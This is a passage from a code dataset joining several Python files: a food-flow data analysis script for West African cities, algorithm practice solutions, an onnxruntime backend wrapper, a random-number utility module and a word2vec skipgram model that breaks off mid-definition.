\"Ghana\")].plot(color=\"lightgrey\", ax=ax2)\ngdf2 = gpd.GeoDataFrame(daily_quantity_destination_geo_sum_tle_cp, geometry='geometry')\ngdf2['values'] = gdf2['daily_quantity']/100 # in 100kg\ngdf2.plot(alpha=0.5, k=5, markersize=gdf2['values'], ax=ax2, legend=True)\nax2.set_title('outflows')\n\nplt.suptitle(\"Maize in Ghana (peak season 2014)\")\nplt.show()\n\n# to export as .GeoJSON (for use in GIS programs)\n\n#gdf1.to_file('/path-to-dir/file_name.GeoJSON', crs='EPSG:4326')\n#gdf2.to_file('/path-to-dir/file_name.GeoJSON', crs='EPSG:4326')\n\n### Fig. 8: Relative inflows of maize (in %) and number of maize source locations along a distance gradient\n#Fig. 8 shows the quantity of maize (in % of total quantity) and number of maize sources (in counts) along a distance gradient aggregated at 10-km intervals. We see that Bamenda sources most of its maize supplies from many nearby sources, while Ouagadougou' major supplier is one city (Bobo-Dioulasso) at a distance of 330 km.\n\n# aggregate at the level of node and compute percent of total quantity (lean season)\ndaily_quantity_sum=df_incoming_lean.groupby(['city','commodity_name_gen', 'season', 'year'], as_index=False)['daily_quantity'].sum()\ndaily_quantity_source_sum=df_incoming_lean.groupby(['city','commodity_name_gen', 'season', 'year', 'source_name', 'distance_to_source_km'], as_index=False)['daily_quantity'].sum()\ndf_incoming_by_node=pd.merge(daily_quantity_source_sum, daily_quantity_sum, how='left', on=['city', 'season', 'year', 'commodity_name_gen'])\ndf_incoming_by_node['percent_of_total_quantity']=df_incoming_by_node['daily_quantity_x']*100/df_incoming_by_node['daily_quantity_y']\n\n# extract maize\n\ndf_incoming_by_node_maize=df_incoming_by_node[(df_incoming_by_node['commodity_name_gen']=='Maize')]\n\n# distance interval\n# aggregate values by 10 km intervals\n\nmax_distance=500\nbins_10km=pd.interval_range(start=0.0, end=max_distance, freq=10)\ndf_10km=df_incoming_by_node_maize.copy()\ndf_10km['interval'] = pd.cut(df_10km.distance_to_source_km, bins=bins_10km.left)\n\n# incoming daily quantities (in % of total quantities) per product and city\n\ndf_sum_10km=df_10km.groupby(['city', 'commodity_name_gen', 'interval'], as_index=False)['percent_of_total_quantity'].sum()\ndf_sum_10km['sum_quantity_percent_by_interval']=df_sum_10km['percent_of_total_quantity']\ndf_sum_10km[['left', 'right']] = [[x.left, x.right] for x in df_sum_10km['interval']]\ndf_count_10km=df_10km.groupby(['city', 'commodity_name_gen', 'interval'], as_index=False)['percent_of_total_quantity'].count()\ndf_count_10km['source_count']=df_count_10km['percent_of_total_quantity']\ndf_sum_count_10km=pd.merge(df_sum_10km, df_count_10km, how='left', on=['city', 'commodity_name_gen', 'interval'])\n\ncity_list=df_sum_count_10km['city'].unique().tolist()\n\nfig, axs = plt.subplots(4, sharex=True)\nfig.subplots_adjust(right=.9)\nfig.subplots_adjust(left=.1)\nfig.subplots_adjust(top=.9)\n\nfor count, city in enumerate(city_list):\n df_sum_count_10km_city=df_sum_count_10km[df_sum_count_10km['city']==city]\n\n distance=df_sum_count_10km_city['right']\n percent_quantity=df_sum_count_10km_city['sum_quantity_percent_by_interval']\n total_source_counts=df_sum_count_10km_city['source_count']\n\n lineplot1=sns.lineplot(x=distance, y=percent_quantity, ax=axs[count], color='#ED553B')\n lineplot1.fill_between(distance, percent_quantity, color='#ED553B',alpha=0.5)\n axs2 = axs[count].twinx()\n lineplot2=sns.lineplot(x=distance, y=total_source_counts, color='#20639B', ax=axs2)\n axs[count].set_title(city, x=0.5, y=0.75, size=9)\n axs[count].set_xlim(0,400)\n axs[count].set_ylim(0,50)\n axs[count].set_xlabel('Distance (km)')\n axs[count].axes.get_yaxis().get_label().set_visible(False)\n axs[count].tick_params(axis='both', which='major', labelsize=8)\n axs2.set_ylim(0,25)\n axs2.axes.get_yaxis().get_label().set_visible(False)\n axs2.tick_params(axis='both', which='major', labelsize=8)\n\n axs[0].legend(['Quantity (in %)'], loc=2, fontsize='8')\n if count ==0:\n axs2.legend(['Number of sources'], loc=1, fontsize='8')\n\nfig.supylabel('Quantity (in %)', size=10)\nfig.text(0.975, 0.5, 'Number of sources', va='center', rotation='vertical', size=10)\nfig.suptitle('Maize inflows along a distance gradient')\nplt.xticks(fontsize=4)\nplt.show()\n\n### Transit flows\n#So far, we only looked at inflows and outflows. Transit flows, the third category of flows, are defined as having their source AND destination outside the urban area, i.e., they pass through the city without a stop. This means that transits flows should have been recorded twice, during entry and exit. This is why quantities are divided by 2. The Tamale-Bolagatanga road, however, was not covered in the night during the first survey in 2013. We account for that by not dividing affecting flows by 2 (those flows that were recorded on other roads).\n# We look at transit flows for tomato in Tamale during the lean season.\n\n# transit flows for aggregated flows (individual flows divided by 2)\n\ndf_transits=df[(df[\"source_within_urban_boundary\"] == \"no\") & (df[\"destination_within_urban_boundary\"] == \"no\")]\n\ndf_transits_one_flow=df_transits.copy()\ndf_transits_two_flows=df_transits.copy()\n\n# recorded once (peak season 2013 not covered during night on Tamale-Bolga road)\n\ntransits_one_flow_list=[3664, 1640, 1638, 1336, 1895, 1896, 1788, 1897, 1804, 1811, 4287, 1803, 1696, 1839, 1993, 1987, 1991, 1961, 1917, 3459, 1932, 1744, 1786, 1827, 1892, 1699, 1662, 1705, 1774, 1301, 1690, 1830, 1828, 1417, 1322, 1688, 1318, 1340, 1809, 1887, 1704, 1879, 1829, 1884, 1701, 1865, 1861, 1693, 1876, 1762, 1700, 1676, 1298, 1826, 1333, 1655, 1807, 1660, 1311, 3486, 1631, 1300, 1883, 1815, 1908, 1960, 1981, 1926, 1927, 1331, 1931, 1986, 1746, 1355]\ndf_transits_one_flow=df_transits_one_flow.loc[(df_transits_one_flow['city']=='Tamale') & (df_transits_one_flow['original_id'].isin(transits_one_flow_list))]\ndf_transits_one_flow.loc[:, 'daily_quantity_transits']=df_transits_one_flow.loc[:, 'daily_quantity_adjusted_for_missing_locations']\n\n# recorded twice when incoming and outgoing\n\ndf_transits_two_flows=df_transits_two_flows.loc[((df_transits_two_flows['city']=='Tamale') & (~df_transits_two_flows['original_id'].isin(transits_one_flow_list))) | (df_transits_two_flows['city']!='Tamale')]\ndf_transits_two_flows.loc[:, 'daily_quantity_transits']=df_transits_two_flows.loc[:, 'daily_quantity_adjusted_for_missing_locations']/2\ndf_transits_sum=pd.concat([df_transits_one_flow, df_transits_two_flows])\n\n# analysis\n# extract crop, season and year\n\ndf_transits_sum_tomato_lean=df_transits_sum[(df_transits_sum['season']=='lean') & (df_transits_sum['year']==2014) & (df_transits_sum['commodity_name_gen']=='Tomato')].copy()\ngrp_df_transits_sum_tomato_lean=df_transits_sum_tomato_lean.groupby(by=['city', 'commodity_name_gen', 'source_name', 'destination_name'], as_index=False)['daily_quantity_transits'].sum()\ndf_transits_sum_tomato_lean_tle=grp_df_transits_sum_tomato_lean[grp_df_transits_sum_tomato_lean['city']=='Tamale']\ndf_transits_sum_tomato_lean_tle.head()\ndf_transits_sum_tomato_lean_tle_sel_columns=df_transits_sum_tomato_lean_tle[['source_name', 'destination_name', 'daily_quantity_transits']]\ndf_transits_sum_tomato_lean_tle_sel_columns.sort_values(by=['daily_quantity_transits'], ascending=False)\n\n\n### Technical validation\n#The following section contains the figures used for assessing the technical validation of the data.\n\n# comparing peak and lean season data (in- and outflows) for Tamale\n# preparing the data according to type of flow (in, out) and season\n\ndf_incoming_lean_tle= df_incoming[(df_incoming['season']=='lean') & (df_incoming['city']=='Tamale')]\ndf_incoming_lean_tle_agg=df_incoming_lean_tle.groupby(by=['city', 'season', 'year', 'commodity_name_gen'], as_index= False)['daily_quantity_adjusted_for_missing_locations'].sum()\ndf_incoming_lean_tle_agg_direction=df_incoming_lean_tle_agg.copy()\ndf_incoming_lean_tle_agg_direction['direction']='in'\n\ndf_incoming_peak_tle= df_incoming[(df_incoming['season']=='peak') & (df_incoming['city']=='Tamale')]\ndf_incoming_peak_tle_agg=df_incoming_peak_tle.groupby(by=['city', 'season', 'year', 'commodity_name_gen'], as_index= False)['daily_quantity_adjusted_for_missing_locations'].sum()\ndf_incoming_peak_tle_agg_direction=df_incoming_peak_tle_agg.copy()\ndf_incoming_peak_tle_agg_direction['direction']='in'\n\ndf_outgoing_lean_tle= df_outgoing[(df_outgoing['season']=='lean') & (df_outgoing['city']=='Tamale')]\ndf_outgoing_lean_tle_agg=df_outgoing_lean_tle.groupby(by=['city', 'season', 'year', 'commodity_name_gen'], as_index= False)['daily_quantity_adjusted_for_missing_locations'].sum()\ndf_outgoing_lean_tle_agg_direction=df_outgoing_lean_tle_agg.copy()\ndf_outgoing_lean_tle_agg_direction['direction']='out'\n\ndf_outgoing_peak_tle= df_outgoing[(df_outgoing['season']=='peak') & (df_outgoing['city']=='Tamale')]\ndf_outgoing_peak_tle_agg=df_outgoing_peak_tle.groupby(by=['city', 'season', 'year', 'commodity_name_gen'], as_index= False)['daily_quantity_adjusted_for_missing_locations'].sum()\ndf_outgoing_peak_tle_agg_direction=df_outgoing_peak_tle_agg.copy()\ndf_outgoing_peak_tle_agg_direction['direction']='out'\n\n# annual variation\n\nincoming_lean_tle_variation=df_incoming_lean_tle_agg_direction.pivot(index='commodity_name_gen', columns='year', values='daily_quantity_adjusted_for_missing_locations')\nincoming_lean_tle_variation['variation_percent']=(incoming_lean_tle_variation[2014]-incoming_lean_tle_variation[2015])*100/incoming_lean_tle_variation[2014]\nincoming_lean_tle_variation['season_direction']='Lean season in'\n\noutgoing_lean_tle_variation=df_outgoing_lean_tle_agg_direction.pivot(index='commodity_name_gen', columns='year', values='daily_quantity_adjusted_for_missing_locations')\noutgoing_lean_tle_variation['variation_percent']=(outgoing_lean_tle_variation[2014]-outgoing_lean_tle_variation[2015])*100/outgoing_lean_tle_variation[2014]\noutgoing_lean_tle_variation['season_direction']='Lean season out'\n\nincoming_peak_tle_variation=df_incoming_peak_tle_agg_direction.pivot(index='commodity_name_gen', columns='year', values='daily_quantity_adjusted_for_missing_locations')\nincoming_peak_tle_variation['variation_percent']=(incoming_peak_tle_variation[2013]-incoming_peak_tle_variation[2014])*100/incoming_peak_tle_variation[2013]\nincoming_peak_tle_variation['season_direction']='Peak season in'\n\noutgoing_peak_tle_variation=df_outgoing_peak_tle_agg_direction.pivot(index='commodity_name_gen', columns='year', values='daily_quantity_adjusted_for_missing_locations')\noutgoing_peak_tle_variation['variation_percent']=(outgoing_peak_tle_variation[2013]-outgoing_peak_tle_variation[2014])*100/outgoing_peak_tle_variation[2013]\noutgoing_peak_tle_variation['season_direction']='Peak season out'\n\n# compare annual variation in %\n# minor flows are ommitted\nlist_products=['Avocado', 'Bean', 'Cassava', 'Cattle', 'Fish', 'Gari', 'Groundnut', 'Maize', 'Millet', 'Onion', 'Plantain', 'Rice', 'Sorghum', 'Soybean', 'Tomato', 'Yam', 'Banana', 'Orange', 'Watermelon']\n\ntle_variation_comp=pd.concat([outgoing_lean_tle_variation, outgoing_peak_tle_variation,incoming_lean_tle_variation,incoming_peak_tle_variation])\ntle_variation_comp1=tle_variation_comp.reset_index()\ntle_variation_comp_selected_products=tle_variation_comp1.loc[tle_variation_comp1['commodity_name_gen'].isin(list_products)]\n\nprint(tle_variation_comp_selected_products)\n\n# plot annual variation\n\ndf_incoming_lean_tle_agg_direction['Flow type by season']='Inflows (lean)'\ndf_incoming_peak_tle_agg_direction['Flow type by season']='Inflows (peak)'\ndf_outgoing_lean_tle_agg_direction['Flow type by season']='Outflows (lean)'\ndf_outgoing_peak_tle_agg_direction['Flow type by season']='Outflows (peak)'\n\ntle_variation=pd.concat([df_incoming_lean_tle_agg_direction, df_outgoing_lean_tle_agg_direction, df_incoming_peak_tle_agg_direction, df_outgoing_peak_tle_agg_direction])\ntle_variation_tonnes=tle_variation.copy()\ntle_variation_tonnes['Daily flows (in tonnes)']=tle_variation_tonnes['daily_quantity_adjusted_for_missing_locations']/1000\n\ntle_variation_selected_products=tle_variation_tonnes.loc[tle_variation_tonnes['commodity_name_gen'].isin(list_products)]\n\npalette = {'Inflows (lean)': '#20639B', 'Inflows (peak)': '#3CAEA3', 'Outflows (lean)': '#F6D55C', 'Outflows (peak)':'#ED553B'}\nplt.figure(figsize=(10, 6))\nax=sns.barplot(data=tle_variation_selected_products, y='Daily flows (in tonnes)', x='commodity_name_gen', hue='Flow type by season', palette=palette, errorbar=(\"pi\", 100), errwidth=1.5)\nplt.xlabel('Commodity')\nplt.xticks(fontsize=8, rotation=45)\nplt.yticks(fontsize=8)\nplt.ylim(0, 350)\nplt.setp(ax.get_legend().get_texts(), fontsize='8') # for legend text\nplt.setp(ax.get_legend().get_title(), fontsize='10') # for legend title\nplt.show()\n\n\n# balance compared with FAO food balance sheets (available on https://www.fao.org/faostat/en/#data/FBS)\n# selected products (item codes codes S2511, S2807, S2514, S2517, S2518, S2532, S2531, S2533, S2535, S2546,\n# S2552, S2601, S2602, S2611, S2615, S2616, S2618), BF: 2014, Ghana: 2014, Mali: 2016, Cameroon: 2017 (available in supplemental_information)\n\ndirectory_FAO=\"/my_directory/\"\ndf_food_balance_sheet=pd.read_csv(directory_FAO+\"Supplementary_Table_2.csv\", delimiter=';')\ndf_food_balance_sheet['Food supply (FAO)']=df_food_balance_sheet['Value']\n\n\n# summarise wheat and wheat flour\n\ndf_incoming.loc[df_incoming['commodity_name_gen']=='Wheat flour', 'commodity_name_gen'] = 'Wheat'\ndf_outgoing.loc[df_outgoing['commodity_name_gen']=='Wheat flour', 'commodity_name_gen'] = 'Wheat'\n\ndf_incoming_agg=df_incoming.groupby(by=['city', 'population', 'season', 'year', 'commodity_name_gen'], as_index= False)['daily_quantity_adjusted_for_missing_locations'].sum()\ndf_outgoing_agg=df_outgoing.groupby(by=['city', 'population', 'season', 'year', 'commodity_name_gen'], as_index= False)['daily_quantity_adjusted_for_missing_locations'].sum()\n\n# our data\n# in\n\ndf_incoming_agg['kg_cap_year']=df_incoming_agg['daily_quantity_adjusted_for_missing_locations']/df_incoming_agg['population']*365\ndf_outgoing_agg['kg_cap_year']=df_outgoing_agg['daily_quantity_adjusted_for_missing_locations']/df_outgoing_agg['population']*365\n\n# Tamale: average season\ndf_incoming_agg_tle=df_incoming_agg[df_incoming_agg['city']=='Tamale']\ndf_incoming_agg_tle_average_season=df_incoming_agg_tle.groupby(by=['city', 'population', 'season', 'commodity_name_gen'], as_index= False)['kg_cap_year'].mean()\n\n# other cities\ndf_incoming_agg_other=df_incoming_agg[(df_incoming_agg['city']=='Ouagadougou') | (df_incoming_agg['city']=='Bamako') | (df_incoming_agg['city']=='Bamenda')]\ndf_incoming_agg_all=pd.concat([df_incoming_agg_tle_average_season, df_incoming_agg_other])\ndf_incoming_agg_average=df_incoming_agg_all.groupby(by=['city', 'population','commodity_name_gen'], as_index= False)['kg_cap_year'].mean()\ndf_incoming_agg_average['Inflows (this dataset)']=df_incoming_agg_average['kg_cap_year']\n\n# out\n\ndf_outgoing_agg['kg_cap_year']=df_outgoing_agg['daily_quantity_adjusted_for_missing_locations']/df_outgoing_agg['population']*365\ndf_outgoing_agg['kg_cap_year']=df_outgoing_agg['daily_quantity_adjusted_for_missing_locations']/df_outgoing_agg['population']*365\n\n# Tamale: average season\ndf_outgoing_agg_tle=df_outgoing_agg[df_outgoing_agg['city']=='Tamale']\ndf_outgoing_agg_tle_average_season=df_outgoing_agg_tle.groupby(by=['city', 'population', 'season', 'commodity_name_gen'], as_index= False)['kg_cap_year'].mean()\n\n# other cities\ndf_outgoing_agg_other=df_outgoing_agg[(df_outgoing_agg['city']=='Ouagadougou') | (df_outgoing_agg['city']=='Bamako') | (df_outgoing_agg['city']=='Bamenda')]\ndf_outgoing_agg_all=pd.concat([df_outgoing_agg_tle_average_season, df_outgoing_agg_other])\ndf_outgoing_agg_average=df_outgoing_agg_all.groupby(by=['city', 'population','commodity_name_gen'], as_index= False)['kg_cap_year'].mean()\ndf_outgoing_agg_average['Outflows (this dataset)']=df_outgoing_agg_average['kg_cap_year']\n\n# balance\n\ndf_in_out_agg_average=pd.merge(df_incoming_agg_average, df_outgoing_agg_average, how='left', on=['city', 'commodity_name_gen'])\ndf_in_out_agg_average['Net inflows (this dataset)']=df_in_out_agg_average['Inflows (this dataset)']-df_in_out_agg_average['Outflows (this dataset)']\n\ndf_in_out_agg_average['Item Code (CPC)']=''\ndf_in_out_agg_average['Area Code (M49)']=999\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Wheat', 'Item Code (CPC)'] = 'S2511'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Rice', 'Item Code (CPC)'] = 'S2807'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Maize', 'Item Code (CPC)'] = 'S2514'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Millet', 'Item Code (CPC)'] = 'S2517'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Sorghum', 'Item Code (CPC)'] = 'S2518'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Cassava', 'Item Code (CPC)'] = 'S2532'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Potato', 'Item Code (CPC)'] = 'S2531'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Sweet potato', 'Item Code (CPC)'] = 'S2533'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Yam', 'Item Code (CPC)'] = 'S2535'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Bean', 'Item Code (CPC)'] = 'S2546'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Groundnut', 'Item Code (CPC)'] = 'S2552'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Onion', 'Item Code (CPC)'] = 'S2602'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Tomato', 'Item Code (CPC)'] = 'S2601'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Orange', 'Item Code (CPC)'] = 'S2611'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Banana', 'Item Code (CPC)'] = 'S2615'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Plantain', 'Item Code (CPC)'] = 'S2616'\ndf_in_out_agg_average.loc[df_in_out_agg_average['commodity_name_gen']=='Pineapple', 'Item Code (CPC)'] = 'S2618'\n\ndf_in_out_agg_average.loc[df_in_out_agg_average['city']=='Tamale', 'Area Code (M49)'] = 288\ndf_in_out_agg_average.loc[df_in_out_agg_average['city']=='Ouagadougou', 'Area Code (M49)'] = 854\ndf_in_out_agg_average.loc[df_in_out_agg_average['city']=='Bamako', 'Area Code (M49)'] = 466\ndf_in_out_agg_average.loc[df_in_out_agg_average['city']=='Bamenda', 'Area Code (M49)'] = 120\n\njoin_data_balance_with_FAO_food_balance=pd.merge(df_in_out_agg_average, df_food_balance_sheet, how='inner', on=[\"Item Code (CPC)\", \"Area Code (M49)\"])\n\n# variation in %\njoin_data_balance_with_FAO_food_balance['variation_percent']=(join_data_balance_with_FAO_food_balance['Net inflows (this dataset)']-join_data_balance_with_FAO_food_balance['Food supply (FAO)'])*100/join_data_balance_with_FAO_food_balance['Net inflows (this dataset)']\njoin_data_balance_with_FAO_food_balance.head()\n\n# plot\njoin_data_balance_with_FAO_food_balance_melt=join_data_balance_with_FAO_food_balance.melt(id_vars=['city', 'commodity_name_gen'], value_vars=['Inflows (this dataset)', 'Net inflows (this dataset)', 'Food supply (FAO)'])\njoin_data_balance_with_FAO_food_balance['city'].unique()\n\npalette={'Inflows (this dataset)': \"#FFE599\", 'Net inflows (this dataset)': \"#ED553B\", 'Food supply (FAO)': \"#20639B\"}\n\nfig, axs = plt.subplots(4, sharex=True, figsize=(13, 15))\nfor count, city in enumerate(join_data_balance_with_FAO_food_balance_melt['city'].unique()):\n join_data_balance_with_FAO_food_balance_melt_city=join_data_balance_with_FAO_food_balance_melt[join_data_balance_with_FAO_food_balance_melt['city']==city]\n sns.lineplot(data=join_data_balance_with_FAO_food_balance_melt_city, x='commodity_name_gen', y='value', hue='variable', ax=axs[count], palette=palette)\n axs[count].axes.get_yaxis().get_label().set_visible(False)\n axs[count].set_title(city, x=0.5, y=0.85, size=9)\n axs[count].tick_params(axis='y', which='major', labelsize=8)\n plt.xticks(fontsize=8, rotation=45)\n fig.supylabel('kg/cap/year', x=0.06, size=10)\n axs[count].legend([],[], frameon=False)\n handles, labels = axs[3].get_legend_handles_labels()\n fig.legend(handles, labels, loc='upper center')\nplt.xlabel('Commodity')\nplt.show()","repo_name":"HannaKarg/food-flows","sub_path":"food_flow_script.py","file_name":"food_flow_script.py","file_ext":"py","file_size_in_byte":28828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"16716127273","text":"#################### 2798 블랙잭\n\n# 시도1 (108ms)\nN, M = map(int, input().split())\ncards = list(map(int, input().split()))\ntotal = []\nfor i in range(N):\n for j in range(i+1, N):\n for k in range(j+1, N):\n sum = cards[i] + cards[j] + cards[k]\n if sum <= M:\n total.append(sum)\nprint(max(total))\n\n# 시도2 (80ms)\nN, M = map(int, input().split())\ncards = list(map(int, input().split()))\ntotal = 0\nfor i in range(N):\n for j in range(i+1, N):\n for k in range(j+1, N):\n sum = cards[i] + cards[j] + cards[k]\n if (sum <= M) & (sum > total):\n total = sum\nprint(total)\n\n\n#################### 2231 분해합\nN = int(input()) \n\nfor i in range(1, N+1): # i = N의 모든 생성자 (i = 198일 때)\n num = sum((map(int, str(i)))) # i의 각 자릿수를 더함 (num = 1+9+8 = 18)\n num_sum = i + num # 분해합 = 생성자 + 각 자릿수의 합 (num_sum = 198 + 18 = 216)\n # 처음으로 분해합과 입력값이 같을때가 가장 작은 생성자\n if num_sum == N: # if 216 == 126\n print(i)\n break\nelse: # for반복문이 다 돈 후에도 num_sum == N에 해당하는 i값을 못찾으면\n print(0)\n \n \n##################### 19532 수학은 비대면 강의입니다\na,b,c,d,e,f = list(map(int,input().split()))\nvalues = []\n\n# 대입 노가다 (x와 y를 -999부터 1000까지 모두 대입)\nfor x in range(-999, 1000):\n for y in range(-999, 1000):\n if a*x + b*y == c:\n values.append([x,y])\n\n# 1행에서 얻은 x,y 묶음을 2행의 방정식에 대입해보면서 최종 해 찾기\nfor xy in values:\n if d*xy[0] + e*xy[1] == f:\n print(xy[0], xy[1])\n break","repo_name":"wonn23/algorithm-study","sub_path":"0418/0418_sng.py","file_name":"0418_sng.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"21604674939","text":"\"\"\"\nonnxruntime backend (https://github.com/microsoft/onnxruntime)\n\"\"\"\n\n# pylint: disable=unused-argument,missing-docstring,useless-super-delegation\n\nimport onnxruntime as rt\nimport os\nimport backend\n\n\nclass BackendOnnxruntime(backend.Backend):\n def __init__(self):\n super(BackendOnnxruntime, self).__init__()\n\n def version(self):\n return rt.__version__\n\n def name(self):\n \"\"\"Name of the runtime.\"\"\"\n return \"onnxruntime\"\n\n def image_format(self):\n \"\"\"image_format. For onnx it is always NCHW.\"\"\"\n return \"NCHW\"\n\n def load(self, model_path, inputs=None, outputs=None):\n \"\"\"Load model and find input/outputs from the model file.\"\"\"\n opt = rt.SessionOptions()\n\n # By default all optimizations are enabled\n # https://onnxruntime.ai/docs/performance/graph-optimizations.html\n # Enable only upto extended optimizations on aarch64 due to an accuracy issue\n if os.environ.get(\"HOST_PLATFORM_FLAVOR\", \"\") == \"aarch64\":\n opt.graph_optimization_level = rt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED\n\n # self.sess = rt.InferenceSession(model_path, opt)\n if len(rt.get_all_providers()) > 1 and os.environ.get(\"USE_GPU\", \"yes\").lower() not in [ \"0\", \"false\", \"off\", \"no\" ]:\n self.sess = rt.InferenceSession(model_path, opt, providers=[\"CUDAExecutionProvider\"])\n else:\n self.sess = rt.InferenceSession(model_path, opt, providers=[\"CPUExecutionProvider\"])\n \n # get input and output names\n if not inputs:\n self.inputs = [meta.name for meta in self.sess.get_inputs()]\n else:\n self.inputs = inputs\n if not outputs:\n self.outputs = [meta.name for meta in self.sess.get_outputs()]\n else:\n self.outputs = outputs\n return self\n\n def predict(self, feed):\n \"\"\"Run the prediction.\"\"\"\n return self.sess.run(self.outputs, feed)\n","repo_name":"mlcommons/inference","sub_path":"vision/classification_and_detection/python/backend_onnxruntime.py","file_name":"backend_onnxruntime.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":971,"dataset":"github-code","pt":"71"}
+{"seq_id":"26476127743","text":"from __future__ import annotations\n\nimport secrets\nfrom math import factorial\nfrom os import urandom\n\nfrom .distributions import random\n\n\ndef rand_below(n: int) -> int:\n \"\"\"Returns a random int in the range [0, n).\"\"\"\n return secrets.randbelow(n)\n\n\ndef rand_bits(k: int) -> int:\n \"\"\"Generates an int with k random bits.\"\"\"\n if k < 0:\n raise ValueError(\"number of bits must be non-negative\")\n numbytes = (k + 7) // 8\n x = int.from_bytes(urandom(numbytes), \"big\")\n return x >> (numbytes * 8 - k)\n\n\ndef rand_bool() -> bool:\n \"\"\"Returns a random bool.\"\"\"\n return random() < 0.5\n\n\ndef rand_int(a: int, b: int) -> int:\n \"\"\"Returns random integer in range [a, b], including both end points.\"\"\"\n return rand_range(a, b + 1)\n\n\ndef rand_ints(a: int, b: int, *, k: int) -> list[int]:\n \"\"\"Returns a list of k random integers in range [a, b].\"\"\"\n return [rand_int(a, b) for _ in range(k)]\n\n\ndef rand_range(start: int, stop: int | None = None, step: int = 1) -> int:\n \"\"\"Chooses a random item from range([start,] stop[, step]).\"\"\"\n if stop is None:\n if step != 1:\n raise TypeError(\"Missing a non-None stop argument\")\n if start > 0:\n return secrets.randbelow(start)\n raise ValueError(\"empty range for rand_range\")\n\n width = stop - start\n if step == 1:\n if width > 0:\n return start + secrets.randbelow(width)\n raise ValueError(f\"empty range for rand_range ({start}, {stop}, {step})\")\n\n if step > 0:\n n = (width + step - 1) // step\n elif step < 0:\n n = (width + step + 1) // step\n else:\n raise ValueError(\"zero step for rand_range\")\n if n <= 0:\n raise ValueError(\"empty range for rand_range\")\n return start + step * secrets.randbelow(n)\n\n\ndef universe_rand() -> int:\n \"\"\"Generates a random number based on the universe.\"\"\"\n bm = 0xFF # bound max, 1 byte\n s = 0\n lt = ord(\"\\n\") # low threshold\n xn: list[int] = []\n ltc = lt\n for i in range(ltc // 2):\n ltc -= i\n xn.append(lt - ltc)\n s = xn.pop(s) # sigma\n for j in range(len(xn)):\n xn[j] -= sum(xn[:j])\n a, b, c, _ = xn\n # simulates quantum noise\n while s < bm:\n t = rand_int(0x00, bm) # theoretical (size -> inf) entity noise probability\n s += int(sum((t**i) / factorial(i) for i in range(t % bm))) # taylor series\n ds = sum(map(int, str(s)))\n while ds >= lt:\n ds = sum(map(int, str(ds))) # one-digit convergence\n return int(bin(bm % (lt + a))[b:] * c, base=2) # as ds converges to lt\n","repo_name":"trag1c/ixia","sub_path":"src/ixia/integers.py","file_name":"integers.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"71"}
+{"seq_id":"30189960672","text":"import sys\n_module = sys.modules[__name__]\ndel sys\ninputdata = _module\nmodel = _module\nword2vec2 = _module\n\nfrom _paritybench_helpers import _mock_config, patch_functional\nfrom unittest.mock import mock_open, MagicMock\nfrom torch.autograd import Function\nfrom torch.nn import Module\nimport abc, collections, copy, enum, functools, inspect, itertools, logging, math, matplotlib, numbers, numpy, pandas, queue, random, re, scipy, sklearn, string, tensorflow, time, torch, torchaudio, torchtext, torchvision, types, typing, uuid, warnings\nimport numpy as np\nfrom torch import Tensor\npatch_functional()\nopen = mock_open()\nyaml = logging = sys = argparse = MagicMock()\nArgumentParser = argparse.ArgumentParser\n_global_config = args = argv = cfg = config = params = _mock_config()\nargparse.ArgumentParser.return_value.parse_args.return_value = _global_config\nyaml.load.return_value = _global_config\nsys.argv = _global_config\n__version__ = '1.0.0'\nxrange = range\nwraps = functools.wraps\n\n\nimport torch\n\n\nfrom torch.autograd import Variable\n\n\nimport torch.nn as nn\n\n\nimport torch.nn.functional as F\n\n\nimport numpy as np\n\n\nimport collections\n\n\nimport math\n\n\nimport random\n\n\nimport torch.optim as optim\n\n\nimport torch.nn.functional as Func\n\n\nfrom torch.optim.lr_scheduler import StepLR\n\n\nimport time\n\n\nclass skipgram(nn.Module):\n\n def __init__(self, vocab_size, embedding_dim):\n super(skipgram, self).__init__()\n self.u_embeddings = nn.Embedding(vocab_size, embedding_dim, sparse=True)\n self.v_embeddings = nn.Embedding(vocab_size, embedding_dim, sparse=True)\n self.embedding_dim = embedding_dim\n self.init_emb()\n\n def init_emb(self):\n initrange = 0.5 / self.embedding_dim\n self.u_embeddings.weight.data.uniform_(-initrange, initrange)\n self.v_embeddings.weight.data.uniform_(-0, 0)\n\n def forward(self, u_pos, v_pos, v_neg, batch_size):\n embed_u = self.u_embeddings(u_pos)\n embed_v = self.v_embeddings(v_pos)\n score = torch.mul(embed_u, embed_v)\n score = torch.sum(score, dim=1)\n log_target = F.logsigmoid(score).squeeze()\n neg_embed_v = self.v_embeddings(v_neg)\n neg_score = torch.bmm(neg_embed_v, embed_u.unsqueeze(2)).squeeze()\n neg_score = torch.sum(neg_score, dim=1)\n sum_log_sampled = F.logsigmoid(-1 * neg_score).squeeze()\n loss = log_target + sum_log_sampled\n return -1 * loss.sum() / batch_size\n\n def input_embeddings(self):\n return self.u_embeddings.weight.data.cpu().numpy()\n\n def 